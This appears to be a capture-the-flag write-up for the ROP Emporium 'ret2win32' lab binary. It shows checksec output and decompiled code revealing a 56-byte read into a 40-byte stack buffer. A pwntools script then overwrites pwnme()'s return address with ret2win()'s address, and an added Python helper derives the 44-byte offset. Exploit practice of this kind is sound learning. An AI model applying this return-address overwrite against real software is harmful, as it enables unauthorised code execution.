file ret2win32
ret2win32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e1596c11f85b3ed0881193fe40783e1da685b851, not stripped
checksec ret2win32
[*] '/root/ropemporium/ret2win32/ret2win32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Stripped: No
cdecl is said to be the default calling convention of x86 C compilers.
int __cdecl main(int argc, const char **argv, const char **envp)
{
    setvbuf(_bss_start, 0, 2, 0);
    puts("ret2win by ROP Emporium");
    puts("x86\n");
    pwnme();
    puts("\nExiting");
    return 0;
}

int pwnme()
{
    _BYTE s[40]; // [esp+0h] [ebp-28h] BYREF
    memset(s, 0, 0x20u);
    puts("For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!");
    puts("What could possibly go wrong?");
    puts("You there, may I have your input please? And don't worry about null bytes, we're using read()!\n");
    printf("> ");
    // 0x38 = 56 bytes are read into a buffer that ends 0x28 = 40 bytes below the saved EBP,
    // so the saved EBP and the return address at ebp+4 are both reachable.
    read(0, s, 0x38u);
    return puts("Thank you!");
}

int ret2win()
{
    puts("Well done! Here's your flag:");
    return system("/bin/cat flag.txt");
}
from pwn import *

p = process('./ret2win32')

# 40 bytes of buffer (s at ebp-0x28) + 4 bytes of saved EBP = 44 bytes of padding
payload = b'A' * 44
# overwrite the return address of pwnme() with the address of ret2win()
payload += p32(0x804862c)

p.send(payload)
p.interactive()
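An added example, not part of the original write-up, that shows where the 44 in the payload comes from: it parses IDA's `[ebp-28h]` annotation from the decompiled `pwnme()`, adds the 4-byte saved EBP to get the distance to the return address, and checks that the `read()` length of 0x38 is large enough to reach it. The annotation string, read length and `ret2win` address are copied from the listing above; everything else is constructed.

```python
import re
import struct

# Values taken from the decompiled pwnme() and the write-up's payload.
BUFFER_ANNOTATION = "_BYTE s[40]; // [esp+0h] [ebp-28h] BYREF"
READ_LENGTH = 0x38          # read(0, s, 0x38u)
RET2WIN_ADDR = 0x804862c    # address of ret2win() used in the payload


def ebp_offset(annotation):
    """Distance of the buffer below EBP, parsed from IDA's [ebp-XXh] comment."""
    m = re.search(r"\[ebp-([0-9A-Fa-f]+)h\]", annotation)
    if m is None:
        raise ValueError("no [ebp-XXh] annotation found")
    return int(m.group(1), 16)


def return_address_offset(annotation):
    """Bytes from the start of the buffer to the saved return address.

    In a cdecl x86 frame the buffer sits at ebp-N, the saved EBP occupies
    the 4 bytes at ebp, and the return address follows at ebp+4.
    """
    return ebp_offset(annotation) + 4


def overflow_reaches_return(annotation, read_len):
    """True if read() can overwrite the whole 4-byte return address slot."""
    return read_len >= return_address_offset(annotation) + 4


def build_payload(annotation, target):
    """Padding up to the return slot, then the target as 32-bit little-endian (p32)."""
    return b"A" * return_address_offset(annotation) + struct.pack("<I", target)


if __name__ == "__main__":
    print(return_address_offset(BUFFER_ANNOTATION))              # 44
    print(overflow_reaches_return(BUFFER_ANNOTATION, READ_LENGTH))  # True
    print(build_payload(BUFFER_ANNOTATION, RET2WIN_ADDR).hex())
```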